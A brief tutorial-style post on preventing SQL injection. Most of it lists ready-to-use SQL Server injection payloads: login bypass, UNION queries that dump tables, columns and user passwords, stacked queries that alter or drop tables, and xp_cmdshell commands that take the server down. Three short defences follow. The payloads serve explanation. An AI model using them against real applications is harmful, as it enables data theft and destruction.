How to prevent SQL Injection
Examples that will return if you have used simple query string in your application.
Fetch All:
x’ or ‘t’=’t’ --
Discover all tables
‘union select 0, id, name,0,0,0,0,0,0,0 from sysobjects where xtype = ‘U’ --
Discover all columns
‘union select 0, name,1,0,0,0,0,0,0,0 from syscolumns --
Steal DB Users
‘union select 0, uid, name, password, roles, 0,0,0,0,0,0,0 from sysusers --
Change Cell Phone Number
888-88-8888’; update authors set phone = ‘111-11-1111’ --
Drop table
888-88-8888’; drop table discounts --
Disconnect or brind SQL Server Down
888-88-8888; exec master..xp.cmdshell ‘ipconfig /release’
(note: this depends on what version of sql database you have. Will only works if allowed by the sql database on your machine)
Or to stop sql
888-88-8888; exec master..xp_cmdshell .net stop sqlserver’
To Pervent all these do one of 3 things:
1- Use Parameterized Queries by using SqlParameter calling addSqlParameter
2- Use Stored Procedure
3- Use LINQ
